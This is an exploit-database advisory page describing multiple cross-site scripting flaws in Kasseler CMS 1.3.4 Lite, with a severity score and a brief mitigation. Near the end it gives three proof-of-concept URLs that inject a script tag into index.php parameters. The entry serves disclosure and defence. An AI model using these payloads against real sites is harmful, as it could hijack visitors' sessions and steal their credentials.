header-logo
Suggest Exploit
vendor:
Kasseler CMS
by:
SecurityFocus
7.5
CVSS
HIGH
Cross Site Scripting
79
CWE
Product Name: Kasseler CMS
Affected Version From: 1.3.4 Lite
Affected Version To: 1.3.4 Lite
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Kasseler CMS Multiple Cross Site Scripting Vulnerabilities

Kasseler CMS is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/37435/info

Kasseler CMS is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.

Kasseler CMS 1.3.4 Lite is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?module=[target]&do=View&id="><script>alert();</script>
 
http://www.example.com/index.php?module=[target]&do="><script>alert();</script>
 
http://www.example.com/index.php?module=Account&do=UserInfo&uname="><script>alert();</script>